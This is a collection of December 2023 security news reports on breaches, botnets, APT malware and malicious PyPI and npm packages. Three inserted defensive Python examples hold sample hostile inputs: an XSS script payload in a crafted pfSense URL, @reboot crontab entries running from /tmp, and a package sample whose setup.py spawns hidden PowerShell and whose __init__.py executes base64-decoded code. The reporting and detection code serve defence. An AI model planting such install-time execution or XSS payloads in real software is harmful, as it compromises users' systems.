On a related note, the U.S. National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and CISA published a list of recommended practices that organizations can adopt in order to harden the software supply chain and improve the safety of their open-source software management processes.

"Organizations that do not follow a consistent and secure-by-design management practice for the open-source software they utilize are more likely to become vulnerable to known exploits in open-source packages and encounter more difficulty when reacting to an incident," said Aeva Black, open-source software security lead at CISA.


MongoDB Suffers Security Breach, Exposing Customer Data
17.12.23  Incident  The Hacker News

MongoDB on Saturday disclosed it's actively investigating a security incident that has led to unauthorized access to "certain" corporate systems, resulting in the exposure of customer account metadata and contact information.

The American database software company said it first detected anomalous activity on December 13, 2023, and that it immediately activated its incident response efforts.

It further noted that "this unauthorized access has been going on for some period of time before discovery," but emphasized it's not "aware of any exposure to the data that customers store in MongoDB Atlas." It did not disclose the exact time period of the compromise.

In light of the breach, MongoDB recommends that all customers be on the lookout for social engineering and phishing attacks, enforce phishing-resistant multi-factor authentication (MFA), as well as rotate their MongoDB Atlas passwords.

That's not all. The company said it's also experiencing elevated login attempts that are causing issues for customers attempting to log in to Atlas and its Support Portal. It, however, said the problem is unrelated to the security event.

When reached for comment, MongoDB told The Hacker News that the incident is a matter of ongoing investigation and that it will "provide updates as soon as we can."

(This is a developing story. Please check back for more updates.)


China's MIIT Introduces Color-Coded Action Plan for Data Security Incidents
16.12.23  Incident  The Hacker News

China's Ministry of Industry and Information Technology (MIIT) on Friday unveiled draft proposals detailing its plans to tackle data security events in the country using a color-coded system.

The effort is designed to "improve the comprehensive response capacity for data security incidents, to ensure timely and effective control, mitigation and elimination of hazards and losses caused by data security incidents, to protect the lawful rights and interests of individuals and organizations, and to safeguard national security and public interests," the department said.

The 25-page document encompasses all incidents in which data has been illegally accessed, leaked, destroyed, or tampered with, categorizing them into four hierarchical tiers based on the scope and the degree of harm caused -

Red: Level I ("especially significant"), which applies to widespread shutdowns, substantial loss of business processing capability, interruptions arising due to serious anomalies lasting more than 24 hours, occurrence of major radio interference for more than 24 hours, economic losses of more than 1 billion yuan, or affects the personal information of over 100 million people or sensitive personal information of more than 10 million people
Orange: Level II ("significant"), which applies to shutdowns and operational interruptions lasting more than 12 hours, occurrence of major radio interference for more than 12 hours, economic losses between 100 million yuan and 1 billion yuan, or affects the personal information of over 10 million people or sensitive personal information of more than 1 million people
Yellow: Level III ("large"), which applies to operational interruptions lasting more than eight hours, occurrence of major radio interference for more than eight hours, economic losses between 50 million yuan and 100 million yuan, or affects the personal information of over 1 million people or sensitive personal information of more than 100,000 people
Blue: Level IV ("general"), which applies to minor events that cause operational interruptions lasting less than eight hours, economic losses of less than 50 million yuan, or affects the personal information of less than 1 million people or sensitive personal information of less than 100,000 people
The new rules also require affected companies to make an assessment to determine the severity of the incident, and if deemed serious, report it immediately to the local industry supervision department without omitting or concealing any facts, or providing any false information.

"If the local industry regulatory department initially determines that it is a particularly major or major data security incident, it should report it to the Mechanism Office in accordance with the requirements of '10 minutes by phone and 30 minutes in writing' after discovering the incident," the draft rules state.

Based on the response level activated – Red or Orange – the Mechanism Office is expected to report the matter to the MIIT. The draft rules are open for public comments until January 15, 2024.


Microsoft Warns of Storm-0539: The Rising Threat Behind Holiday Gift Card Frauds
16.12.23  Cyber  The Hacker News

Microsoft is warning of an uptick in malicious activity from an emerging threat cluster it's tracking as Storm-0539 for orchestrating gift card fraud and theft via highly sophisticated email and SMS phishing attacks against retail entities during the holiday shopping season.

The goal of the attacks is to propagate booby-trapped links that direct victims to adversary-in-the-middle (AiTM) phishing pages that are capable of harvesting their credentials and session tokens.

"After gaining access to an initial session and token, Storm-0539 registers their own device for subsequent secondary authentication prompts, bypassing MFA protections and persisting in the environment using the fully compromised identity," the tech giant said in a series of posts on X (formerly Twitter).

The foothold obtained in this manner further acts as a conduit for escalating privileges, moving laterally across the network, and accessing cloud resources in order to grab sensitive information, specifically going after gift card-related services to facilitate fraud.

On top of that, Storm-0539 collects emails, contact lists, and network configurations for follow-on attacks against the same organizations, necessitating the need for robust credential hygiene practices.

Redmond, in its monthly Microsoft 365 Defender report published last month, described the adversary as a financially motivated group that has been active since at least 2021.

"Storm-0539 carries out extensive reconnaissance of targeted organizations in order to craft convincing phishing lures and steal user credentials and tokens for initial access," it said.

"The actor is well-versed in cloud providers and leverages resources from the target organization's cloud services for post-compromise activities."

The disclosure comes days after the company said it obtained a court order to seize the infrastructure of a Vietnamese cybercriminal group called Storm-1152 that sold access to approximately 750 million fraudulent Microsoft accounts as well as identity verification bypass tools for other technology platforms.

Earlier this week, Microsoft also warned that multiple threat actors are abusing OAuth applications to automate financially motivated cyber crimes, such as business email compromise (BEC), phishing, large-scale spamming campaigns, and deploy virtual machines to illicitly mine for cryptocurrencies.


New KV-Botnet Targeting Cisco, DrayTek, and Fortinet Devices for Stealthy Attacks
16.12.23  BotNet  The Hacker News

A new botnet consisting of firewalls and routers from Cisco, DrayTek, Fortinet, and NETGEAR is being used as a covert data transfer network for advanced persistent threat actors, including the China-linked threat actor called Volt Typhoon.

Dubbed KV-botnet by the Black Lotus Labs team at Lumen Technologies, the malicious network is an amalgamation of two complementary activity clusters that have been active since at least February 2022.

"The campaign infects devices at the edge of networks, a segment that has emerged as a soft spot in the defensive array of many enterprises, compounded by the shift to remote work in recent years," the company said.

The two clusters – codenamed KY and JDY – are said to be distinct yet working in tandem to facilitate access to high-profile victims as well as establish covert infrastructure. Telemetry data suggests that the botnet is commandeered from IP addresses based in China.

While the bots that are part of JDY engage in broader scanning using less sophisticated techniques, the KY component, featuring largely outdated and end-of-life products, is assessed to be reserved for manual operations against high-profile targets selected by the former.

It's suspected that Volt Typhoon is at least one user of the KV-botnet and it encompasses a subset of their operational infrastructure, which is evidenced by the noticeable decline in operations in June and early July 2023, coinciding with the public disclosure of the adversarial collective's targeting of critical infrastructure in the U.S.

Microsoft, which first exposed the threat actor's tactics, said it "tries to blend into normal network activity by routing traffic through compromised small office and home office (SOHO) network equipment, including routers, firewalls, and VPN hardware."

The exact initial infection mechanism used to breach the devices is currently unknown. It's followed by the first-stage malware taking steps to remove security programs and other malware strains so as to ensure that it's the "only presence" on these machines.

It's also designed to retrieve the main payload from a remote server, which, in addition to beaconing back to the same server, is also capable of uploading and downloading files, running commands, and executing additional modules.

Over the past month, the botnet's infrastructure has received a facelift, targeting Axis IP cameras, indicating that the operators could be gearing up for a new wave of attacks.

"One of the rather interesting aspects of this campaign is that all the tooling appears to reside completely in-memory," the researchers said. "This makes detection extremely difficult, at the cost of long-term persistence."

"As the malware resides completely in-memory, by simply power-cycling the device the end user can cease the infection. While that removes the imminent threat, re-infection is occurring regularly."

The findings arrive as The Washington Post reported that two dozen critical entities in the U.S. have been infiltrated by Volt Typhoon over the past year, including power and water utilities as well as communications and transportation systems.

"The hackers often sought to mask their tracks by threading their attacks through innocuous devices such as home or office routers before reaching their victims," the report added.


Crypto Hardware Wallet Ledger's Supply Chain Breach Results in $600,000 Theft
15.12.23  Cryptocurrency  The Hacker News

Crypto hardware wallet maker Ledger published a new version of its "@ledgerhq/connect-kit" npm module after unidentified threat actors pushed malicious code that led to the theft of more than $600,000 in virtual assets.

The compromise was the result of a former employee falling victim to a phishing attack, the company said in a statement.

This allowed the attackers to gain access to Ledger's npm account and upload three malicious versions of the module – 1.1.5, 1.1.6, and 1.1.7 – and propagate crypto drainer malware to other applications that are dependent on the module, resulting in a software supply chain breach.

"The malicious code used a rogue WalletConnect project to reroute funds to a hacker wallet," Ledger said.

Connect Kit, as the name implies, makes it possible to connect DApps (short for decentralized applications) to Ledger's hardware wallets.

According to security firm Sonatype, version 1.1.7 directly embedded a wallet-draining payload to execute unauthorized transactions in order to transfer digital assets to an actor-controlled wallet.

Versions 1.1.5 and 1.1.6, while lacking an embedded drainer, were modified to download a secondary npm package, identified as 2e6d5f64604be31, which acts as a crypto drainer. The module is still available for download as of writing.


"Once installed into your software, the malware presents the users with a fake modal prompt that invites them to connect wallets," Sonatype researcher Ilkka Turunen said. "Once the users click through this modal, the malware begins draining funds from the connected wallets."

The malicious file is estimated to have been live for around five hours, although the active exploitation window during which the funds were drained was limited to a period of less than two hours.

Ledger has since removed all three malicious versions of Connect Kit from npm and published 1.1.8 to mitigate the issue. It has also reported the threat actor's wallet addresses and noted that stablecoin issuer Tether has frozen the stolen funds.

If anything, the development underscores the continued targeting of open-source ecosystems, with software registries such as PyPI and npm increasingly used as vectors for installing malware through supply chain attacks.

"The specific targeting of cryptocurrency assets demonstrates the evolving tactics of cybercriminals to achieve significant financial gains within the space of hours, directly monetising their malware," Turunen noted.


New Security Vulnerabilities Uncovered in pfSense Firewall Software - Patch Now
15.12.23  Vulnerability  The Hacker News

Multiple security vulnerabilities have been discovered in the open-source Netgate pfSense firewall solution that could be chained by an attacker to execute arbitrary commands on susceptible appliances.

The issues relate to two reflected cross-site scripting (XSS) bugs and one command injection flaw, according to new findings from Sonar.

"Security inside a local network is often more lax as network administrators trust their firewalls to protect them from remote attacks," security researcher Oskar Zeino-Mahmalat said.

"Potential attackers could have used the discovered vulnerabilities to spy on traffic or attack services inside the local network."

Impacting pfSense CE 2.7.0 and below and pfSense Plus 23.05.1 and below, the shortcomings could be weaponized by tricking an authenticated pfSense user (i.e., an admin user) into clicking on a specially crafted URL, which contains an XSS payload that activates command injection.

A brief description of the flaws is given below -

CVE-2023-42325 (CVSS score: 5.4) - An XSS vulnerability that allows a remote attacker to gain privileges via a crafted URL to the status_logs_filter_dynamic.php page.
CVE-2023-42327 (CVSS score: 5.4) - An XSS vulnerability that allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.
CVE-2023-42326 (CVSS score: 8.8) - A lack of validation that allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.
Reflected XSS attacks, also called non-persistent attacks, occur when an attacker delivers a malicious script to a vulnerable web application, which is then returned in the HTTP response and executed on the victim's web browser.

As a result, attacks of this kind are triggered by means of crafted links embedded in phishing messages or a third-party website, for example, in a comment section or in the form of links shared on social media posts. In the case of pfSense, the threat actor can perform actions in the firewall with the victim's permissions.
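The defect behind a reflected XSS is that a request parameter is copied into the HTML response without encoding. The following is an added example, not code from pfSense or from Sonar's write-up: it takes a constructed crafted link (the `filter` parameter name and the harmless `alert(1)` value are assumptions for illustration), renders it once the vulnerable way and once with HTML escaping, and shows that only the escaped rendering neutralizes the markup.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: a link of the kind a phishing message would carry.
# The "filter" parameter and its value are illustrative assumptions only,
# not the pfSense parameter or the actual payload from the advisory.
CRAFTED_URL = (
    "https://fw.example.internal/status_logs_filter_dynamic.php"
    "?filter=<script>alert(1)</script>"
)


def query_param(url: str, name: str) -> str:
    """Return the first value of a query parameter, or '' if it is absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(filter_text: str) -> str:
    """Reflects the parameter into the page verbatim.

    Whatever the link carried lands inside the HTML body, so the browser
    executes it with the logged-in user's session: a reflected XSS.
    """
    return f"<p>Showing logs matching: {filter_text}</p>"


def render_hardened(filter_text: str) -> str:
    """Encodes the parameter before it reaches the HTML body.

    html.escape turns <, >, &, " and ' into entities, so the text is shown
    to the user as literal characters instead of being parsed as markup.
    """
    return f"<p>Showing logs matching: {html.escape(filter_text, quote=True)}</p>"


def contains_active_markup(rendered: str) -> bool:
    """Crude comparison helper: does the rendered page carry a literal
    <script> tag? Good enough to contrast the two renderings above."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    value = query_param(CRAFTED_URL, "filter")
    print("vulnerable:", render_vulnerable(value))
    print("hardened:  ", render_hardened(value))
```

Escaping at the point of output is the fix for the XSS half of the chain; the command injection half needs the server-side parameters validated regardless of who sent them, since the request arrives with a legitimate admin session.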

"Because the pfSense process runs as root to be able to change networking settings, the attacker can execute arbitrary system commands as root using this attack," Zeino-Mahmalat said.

Following responsible disclosure on July 3, 2023, the flaws were addressed in pfSense CE 2.7.1 and pfSense Plus 23.09 released last month.

The development comes weeks after Sonar detailed a remote code execution flaw in Microsoft Visual Studio Code's built-in integration of npm (CVE-2023-36742, CVSS score: 7.8) that could be weaponized to execute arbitrary commands. It was addressed by Microsoft as part of its Patch Tuesday updates for September 2023.


Google's New Tracking Protection in Chrome Blocks Third-Party Cookies
15.12.23  Safety  The Hacker News


Google on Thursday announced that it will start testing a new feature called "Tracking Protection" starting January 4, 2024, to 1% of Chrome users as part of its efforts to deprecate third-party cookies in the web browser.

The setting is designed to limit "cross-site tracking by restricting website access to third-party cookies by default," Anthony Chavez, vice president of Privacy Sandbox at Google, said.

The tech giant noted that participants for Tracking Protection will be selected at random and that chosen users will be notified upon opening Chrome on either a desktop or an Android device.

The goal is to restrict third-party cookies (also called "non-essential cookies") by default, preventing them from being used to track users as they move from one website to the other for serving personalized ads.

While several major browsers like Apple Safari and Mozilla Firefox have already placed restrictions on third-party cookies via features such as Intelligent Tracking Prevention (ITP) in Safari and Enhanced Tracking Protection in Firefox, Google is taking more of a middle-ground approach that involves devising alternatives where users can access free online content and services without compromising on their privacy.


In mid-October 2023, Google confirmed its plans to "disable third-party cookies for 1% of users from Q1 2024 to facilitate testing, and then ramp up to 100% of users from Q3 2024."

Privacy Sandbox, instead of providing a cross-site or cross-app user identifier, "aggregates, limits, or noises data" through APIs like Protected Audience (formerly FLEDGE), Topics, and Attribution Reporting to help prevent user re-identification.

In doing so, the goal is to block third-parties from tracking user browsing behavior across sites, while still allowing sites and apps to serve relevant ads and enabling advertisers to measure the performance of their online ads without using individual identifiers.

"With Tracking Protection, Privacy Sandbox and all of the features we launch in Chrome, we'll continue to work to create a web that's more private than ever, and universally accessible to everyone," Chavez said.


New NKAbuse Malware Exploits NKN Blockchain Tech for DDoS Attacks
15.12.23  Virus  The Hacker News

A novel multi-platform threat called NKAbuse has been discovered using a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel.

"The malware utilizes NKN technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities," Russian cybersecurity company Kaspersky said in a Thursday report.

NKN, which has over 62,000 nodes, is described as a "software overlay network built on top of today's Internet that enables users to share unused bandwidth and earn token rewards." It incorporates a blockchain layer on top of the existing TCP/IP stack.

While threat actors are known to take advantage of emerging communication protocols for command-and-control (C2) purposes and evade detection, NKAbuse leverages blockchain technology to conduct distributed denial-of-service (DDoS) attacks and function as an implant inside compromised systems.

Specifically, it uses the protocol to talk to the bot master and receive/send commands. The malware is implemented in the Go programming language, and evidence points to it being used primarily to single out Linux systems, including IoT devices.

It's currently not known how widespread the attacks are, but one instance identified by Kaspersky entails the exploitation of a six-year-old critical security flaw in Apache Struts (CVE-2017-5638, CVSS score: 10.0) to breach an unnamed financial company.

Successful exploitation is followed by the delivery of an initial shell script that's responsible for downloading the implant from a remote server, but not before checking the operating system of the target host. The server hosting the malware houses eight different versions of NKAbuse to support various CPU architectures: i386, arm64, arm, amd64, mips, mipsel, mips64, and mips64el.

Another notable aspect is its lack of a self-propagation mechanism, meaning the malware needs to be delivered to a target by another initial access pathway, such as through the exploitation of security flaws.

"NKAbuse makes use of cron jobs to survive reboots," Kaspersky said. "To achieve that, it needs to be root. It checks that the current user ID is 0 and, if so, proceeds to parse the current crontab, adding itself for every reboot."
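Persistence through a root crontab leaves a visible trace that a defender can check for. The following is an added example, not part of Kaspersky's report or of NKAbuse itself: a small crontab parser run over a constructed `crontab -l` listing (every path and command in it is invented for this example, not an NKAbuse indicator) that flags `@reboot` jobs and jobs whose executable lives in a world-writable scratch directory.

```python
# Constructed sample crontab, in the format `crontab -l` prints. The commands
# and paths are invented for this example and are not indicators of NKAbuse.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
@reboot /usr/bin/pgrep -x sshd >/dev/null || systemctl start ssh
@reboot /tmp/.x/agent
*/5 * * * * /var/tmp/.cache/updater
"""

# Directories any local user can write to; a scheduled binary living here
# is unusual for legitimate administration and worth a closer look.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_crontab(text: str):
    """Return a list of (schedule, command) tuples.

    Handles both the five-field schedule form and the @reboot/@daily
    shortcuts; comments and blank lines are skipped.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:  # malformed line, nothing to schedule
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append((schedule, command.strip()))
    return entries


def find_persistence_candidates(text: str):
    """Return (schedule, command, reasons) for every entry that either runs
    at boot or executes something from a scratch directory."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if schedule == "@reboot":
            reasons.append("runs at boot")
        executable = command.split()[0] if command else ""
        if executable.startswith(SCRATCH_DIRS):
            reasons.append(f"executable in scratch directory: {executable}")
        if reasons:
            findings.append((schedule, command, reasons))
    return findings


if __name__ == "__main__":
    for schedule, command, reasons in find_persistence_candidates(SAMPLE_CRONTAB):
        print(f"{schedule:12} {command:50} {'; '.join(reasons)}")
```

An `@reboot` entry is not malicious by itself (the sshd watchdog in the sample is the kind of job an administrator might legitimately add), so the output is a triage list rather than a verdict; the point is that in-memory malware that wants to survive a power cycle has to leave this kind of on-disk footprint, and the root crontab is one of the first places to read.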

NKAbuse also incorporates a bevy of backdoor features that allow it to periodically send a heartbeat message to the bot master, which contains information about the system, capture screenshots of the current screen, perform file operations, and run system commands.

"This particular implant appears to have been meticulously crafted for integration into a botnet, yet it can adapt to functioning as a backdoor in a specific host," Kaspersky said. "Moreover, its use of blockchain technology ensures both reliability and anonymity, which indicates the potential for this botnet to expand steadily over time, seemingly devoid of an identifiable central controller."

"We are surprised to see NKN is used in such a way," Zheng "Bruce" Li, co-founder of NKN, told The Hacker News. "We built NKN to provide true peer-to-peer communication that is secure, private, decentralized, and massively scalable. We are trying to learn more about the report to see if together we can make the internet safe and neutral."


116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems
15.12.23  Virus  The Hacker News

Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor.

"In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week.

The packages are estimated to have been downloaded over 10,000 times since May 2023.

The threat actors behind the activity have been observed using three techniques to bundle malicious code into Python packages, namely via a test.py script, embedding PowerShell in setup.py file, and incorporating it in obfuscated form in the __init__.py file.
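The three packaging techniques leave static traces that can be checked before a package is installed. The following is an added example and not ESET's tooling or any real package's code: a scanner that parses each Python file in a package with the standard `ast` module and reports a `setup.py` that spawns PowerShell, an `__init__.py` that passes decoded data to `exec`, and a bundled `test.py`. The sample package contents are constructed stand-ins with harmless commands that only mimic the shape of the techniques.

```python
import ast
import re

# Constructed sample package, keyed by relative path. The commands are
# harmless stand-ins written for this example; they mimic the shape of the
# three techniques, not any real package's code.
SAMPLE_PACKAGE = {
    "setup.py": (
        "from setuptools import setup\n"
        "import subprocess\n"
        "subprocess.Popen(['powershell', '-w', 'hidden', '-c', 'Write-Output hi'])\n"
        "setup(name='demo', version='0.1')\n"
    ),
    "demo/__init__.py": (
        "import base64\n"
        "exec(base64.b64decode('cHJpbnQoJ2hpJyk='))\n"  # base64 of print('hi')
    ),
    "demo/test.py": "print('tests')\n",
}

# A benign package for comparison, also constructed for this example.
CLEAN_PACKAGE = {
    "setup.py": "from setuptools import setup\nsetup(name='ok', version='1.0')\n",
    "ok/__init__.py": "VERSION = '1.0'\n",
}

POWERSHELL_RE = re.compile(r"\bpowershell(\.exe)?\b", re.IGNORECASE)
SPAWN_CALLS = {"Popen", "run", "call", "check_output", "system"}
DECODE_CALLS = {"b64decode", "decompress", "unhexlify", "a85decode"}


def module_calls(source: str) -> set:
    """Collect the names of every function or method called in the module,
    e.g. {'Popen', 'setup'} for the sample setup.py."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name):
                names.add(func.id)
            elif isinstance(func, ast.Attribute):
                names.add(func.attr)
    return names


def scan_package(files: dict) -> list:
    """Return (path, finding) pairs for the indicators described above."""
    findings = []
    for path, source in files.items():
        name = path.rsplit("/", 1)[-1]
        try:
            calls = module_calls(source)
        except SyntaxError:
            findings.append((path, "file is not parseable Python"))
            continue
        if name == "setup.py" and POWERSHELL_RE.search(source) and calls & SPAWN_CALLS:
            findings.append((path, "setup.py spawns PowerShell at install time"))
        if name == "__init__.py" and "exec" in calls and calls & DECODE_CALLS:
            findings.append((path, "__init__.py executes decoded/obfuscated code"))
        if name == "test.py":
            findings.append((path, "bundled test.py script (weak signal; read it)"))
    return findings


if __name__ == "__main__":
    for path, finding in scan_package(SAMPLE_PACKAGE):
        print(f"{path}: {finding}")
```

Parsing with `ast` rather than grepping means an `exec` hidden behind an alias or a line break is still seen as a call, while a word like "powershell" inside a docstring on its own does not trigger the `setup.py` rule because a spawning call must be present too. The scan is a pre-install review aid, not a verdict: the `test.py` rule in particular only says that the file exists and should be read.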

Irrespective of the method used, the end goal of the campaign is to compromise the targeted host with malware, primarily a backdoor capable of remote command execution, data exfiltration, and taking screenshots. The backdoor module is implemented in Python for Windows and in Go for Linux.

Alternatively, the attack chains also culminate in the deployment of W4SP Stealer or a clipper malware designed to keep close tabs on a victim's clipboard activity and swap the original wallet address, if present, with an attacker-controlled address.


The development is the latest in a wave of compromised Python packages attackers have released to poison the open-source ecosystem and distribute a medley of malware for supply chain attacks.

It's also the newest addition to a steady stream of bogus PyPI packages that have acted as a stealthy channel for distributing stealer malware. In May 2023, ESET revealed another cluster of libraries that were engineered to propagate Sordeal Stealer, which borrows its features from W4SP Stealer.

Then, last month, malicious packages masquerading as seemingly innocuous obfuscation tools were found to deploy a stealer malware codenamed BlazeStealer.

"Python developers should thoroughly vet the code they download, especially checking for these techniques, before installing it on their systems," the researchers cautioned.

The disclosure also follows the discovery of npm packages that were found targeting an unnamed financial institution as part of an "advanced adversary simulation exercise." The names of the modules, which contained an encrypted blob, have been withheld to protect the identity of the organization.

"This decrypted payload contains an embedded binary that cleverly exfiltrates user credentials to a Microsoft Teams webhook that is internal to the target company in question," software supply chain security firm Phylum disclosed last week.


New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities
14.12.23  BigBrothers  The Hacker News

A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi.

The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor.

"Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war," security researcher Aleksandar Milenkoski said in a report shared with The Hacker News.

Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access.

Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStage, Spark, Pierogi, PoisonIvy, and XtremeRAT among others.

The threat actor is assessed to be a composite of several sub-groups that share overlapping victimology footprints and malware, such as Molerats, Arid Viper, and a cluster referred to as Operation Parliament by Kaspersky.

In recent months, the adversarial collective has been linked to a series of attacks that deliver improvised variants of its Micropsia and Arid Gopher implants as well as a new initial access downloader dubbed IronWind.

The latest set of intrusions mounted by Gaza Cyber Gang has been found to leverage Pierogi++ and Micropsia. The first recorded use of Pierogi++ goes back to late 2022.


Attack chains are characterized by the use of decoy documents written in Arabic or English and pertaining to matters of interest to Palestinians to deliver the backdoors.

Cybereason, which shed light on Pierogi in February 2020, described it as an implant that allows attackers to spy on targeted victims and that the "commands used to communicate with the [command-and-control] servers and other strings in the binary are written in Ukrainian."

"The backdoor may have been obtained in underground communities rather than home-grown," it assessed at the time.

Both Pierogi and Pierogi++ are equipped to take screenshots, execute commands, and download attacker-provided files. Another notable aspect is that the updated artifacts no longer feature any Ukrainian strings in the code.

SentinelOne's investigation into Gaza Cyber Gang's operations has also yielded tactical connections between two disparate campaigns referred to as Big Bang and Operation Bearded Barbie, in addition to reinforcing ties between the threat actor and WIRTE, as previously disclosed by Kaspersky in November 2021.

The sustained focus on Palestine notwithstanding, the discovery of Pierogi++ underscores that the group continues to refine and retool its malware to ensure successful compromise of targets and to maintain persistent access to their networks.

"The observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggest that the group has likely been undergoing a consolidation process," Milenkoski said.

"This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors."


Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
14.12.23  BigBrothers  The Hacker News

The Iranian state-sponsored threat actor known as OilRig deployed three different malware downloaders throughout 2022 to maintain persistent access to victim organizations located in Israel.

The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader dubbed SampleCheck5000 (or SC5k).

"These lightweight downloaders [...] are notable for using one of several legitimate cloud service APIs for [command-and-control] communication and data exfiltration: the Microsoft Graph OneDrive or Outlook APIs, and the Microsoft Office Exchange Web Services (EWS) API," security researchers Zuzana Hromcová and Adam Burgher said in a report shared with The Hacker News.

By using well-known cloud service providers for command-and-control communication, the goal is to blend with authentic network traffic and cover up the group's attack infrastructure.

Some of the targets of the campaign include an organization in the healthcare sector, a manufacturing company, and a local governmental organization, among others. All the victims are said to have been previously targeted by the threat actor.

The exact initial access vector used to compromise the targets is currently unclear and it's not known if the attackers managed to retain their foothold in the networks so as to deploy these downloaders at various points of time in 2022.

OilRig, also known as APT34, Crambus, Cobalt Gypsy, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten, is an Iranian cyber espionage group that's known to be active since at least 2014, using a wide range of malware at its disposal to target entities in the Middle East.


This year alone, the hacking crew has been observed leveraging novel malware like MrPerfectionManager, PowerExchange, Solar, Mango, and Menorah.


ODAgent, first detected in February 2022, is a C#/.NET downloader that utilizes Microsoft OneDrive API for command-and-control (C2) communications, allowing the threat actor to download and execute payloads, and exfiltrate staged files.

SampleCheck5000, on the other hand, is designed to interact with a shared Microsoft Exchange mail account to download and execute additional OilRig tools using the Office Exchange Web Services (EWS) API.

OilBooster, in the same way as ODAgent, uses Microsoft OneDrive API for C2, whereas OilCheck adopts the same technique as SampleCheck5000 to extract commands embedded in draft messages. But instead of using the EWS API, it leverages Microsoft Graph API for network communications.

OilBooster is also similar to OilCheck in that it employs the Microsoft Graph API to connect to a Microsoft Office 365 account. What's different this time around is that the API is used to interact with an actor-controlled OneDrive account as opposed to an Outlook account in order to fetch commands and payloads from victim-specific folders.

These tools also share similarities with MrPerfectionManager and PowerExchange backdoors when it comes to using email-based C2 protocols to exfiltrate data, although in the case of the latter, the victimized organization's Exchange Server is used to send messages to the attacker's email account.

"In all cases, the downloaders use a shared (email or cloud storage) OilRig-operated account to exchange messages with the OilRig operators; the same account is typically shared by multiple victims," the researchers explained.

"The downloaders access this account to download commands and additional payloads staged by the operators, and to upload command output and staged files."


Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks
14.12.23  APT  The Hacker News

Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023.

The activity has been tied to a nation-state group known as APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain attack targeting SolarWinds and its customers in 2020.

"The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments," cybersecurity agencies from Poland, the U.K., and the U.S. said.

The vulnerability in question is CVE-2023-42793 (CVSS score: 9.8), a critical security flaw that could be weaponized by unauthenticated attackers to achieve remote code execution on affected systems. It has since come under active exploitation by hacking crews, including those associated with North Korea, for malware delivery.

"The TeamCity exploitation usually resulted in code execution with high privileges granting the SVR an advantageous foothold in the network environment," the agencies noted.

"If compromised, access to a TeamCity server would provide malicious actors with access to that software developer's source code, signing certificates, and the ability to subvert software compilation and deployment processes — access a malicious actor could further use to conduct supply chain operations."

Successful initial access is typically followed by reconnaissance, privilege escalation, lateral movement, and data exfiltration, while simultaneously taking steps to evade detection using an open-source tool called EDRSandBlast. The end goal of the attacks is to deploy a backdoor codenamed GraphicalProton that functions as a loader to deliver additional payloads.

GraphicalProton, which is also known as VaporRage, leverages OneDrive as a primary command-and-control (C2) communication channel, with Dropbox treated as a fallback mechanism. It has been put to use by the threat actor as part of an ongoing campaign dubbed Diplomatic Orbiter that singles out diplomatic agencies across the world.

As many as 100 devices located across the U.S., Europe, Asia, and Australia are said to have been compromised as a result of what's suspected to be opportunistic attacks.

Targets of the campaign include an energy trade association; firms that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT enterprises.

The disclosure comes as Microsoft revealed Russia's multi-pronged assault on Ukraine's agriculture sector from June through September 2023 to penetrate networks, exfiltrate data, and deploy destructive malware such as SharpWipe (aka WalnutWipe).

The intrusions have been tied back to two nation-state groups codenamed Aqua Blizzard (formerly Actinium) and Seashell Blizzard (formerly Iridium), respectively.

Seashell Blizzard has also been observed taking advantage of pirated Microsoft Office software harboring the DarkCrystalRAT (aka DCRat) backdoor to gain initial access, subsequently using it to download a second-stage payload named Shadowlink that masquerades as Microsoft Defender but, in reality, installs a TOR service for surreptitious remote access.

